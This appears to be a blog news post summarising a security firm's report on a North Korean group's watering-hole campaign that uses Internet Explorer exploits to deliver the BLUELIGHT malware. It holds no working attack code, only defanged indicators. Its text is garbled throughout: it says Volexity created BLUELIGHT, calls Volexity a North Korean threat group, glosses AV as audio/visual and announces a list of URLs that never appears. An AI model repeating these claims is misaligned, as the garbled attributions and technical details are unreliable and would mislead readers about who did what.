The North Korean hacker group has developed a custom malware using browser exploits.

The cybersecurity firm Volexity revealed on a recent hacking campaign in which the North Korean Hacker Group deployed the customer malware by exploiting browser bugs.

This was an attack launched by the well-known North Korean hacking outfit, not only this but they are believed to have used browser exploits to infect a restricted number of victims with proprietary malware.

While not an official alias, the threat organization behind this attack was dubbed InkySquid, and they have been utilizing this exploit to install obfuscated Javascript code on Internet Explorer since 2020 in targeted attacks against the browser.


For security researchers, Volexity determined in April 2021 that malicious code was distributed by using www.dailynk[.]com to subdomains on the jQuery[.]services domain that were under malicious control.

As stated previously, there are two sorts of URLs that have been discovered:



The threat actors' attacks often include short-term, one-time-use code that is immediately erased after completion.

According to the researchers' analysis, this action was fairly tough to describe as there was a lot of malignant content within the ill-disposed content.

Common Vulnerability Scoring System CVE-2020-1380 (CVSS score: 7.5) Memory corruption vulnerability in the scripting engine's memory.

The malicious code was able to be identified at the outset, and the threat actor was detected making use of CVE-2020-1380, an exploit for Internet Explorer.

Internet Explorer memory corruption vulnerability CVE-2021-26411 (CVSS score: 8.8)

This CVE was previously utilized in an exploit affecting the Internet Explorer and Microsoft Edge as well. Nevertheless, the redirect code was adjusted in a way that was analogous to the way it was inserted in CVE-2020-1380.

names for subdirectories

Additionally, the names of the hackers' subdirectories are listed below:

logo \snormal \sbackground \stheme \sround

collecting data

The threat actors collected these data:

Internet IP

The default interface's local IP address


Regardless of the binary size of the implant, the latter can always hold 1,000 bits.

Increase the process SID authorization level

uniform input processing

This list describes all of the AV (audio/visual) products installed.

BLUELIGHT can be installed whether the infected workstation has VM tools running

Many threat actors have deployed a number of attacks, and as a result, they've used a new and innovative malware family hosted on a separate subdomain of jquery[.]services.

The researchers declared that the file titled “history” is an XOR-encoded (0xCF) copy of a proprietary malware family and they named it BLUELIGHT, citing the malware developer and Volexity, who claim BLUELIGHT is created by Volexity.

When Cobalt Strike has succeeded, BLUELIGHT is utilized as a secondary payload that follows. This was often the case, however in some instances, this tactic was utilized as an initial payload.

BLUELIGHT's threat actors mostly accessed the Microsoft Graph API for Microsoft 365, Office, and other services, via the Microsoft Graph API for Microsoft 365, Office, and other services. The analysis of Volexity, a North Korean threat group, named as ScarCruft or APT37, says that InkySquid, a hacking gang associated with ScarCruft, is also behind the recent attacks.

As also, the experts are making every effort to learn everything they can about this attack and how it was carried out in order to ward off future attempts of this type.

Post a Comment

Previous Post Next Post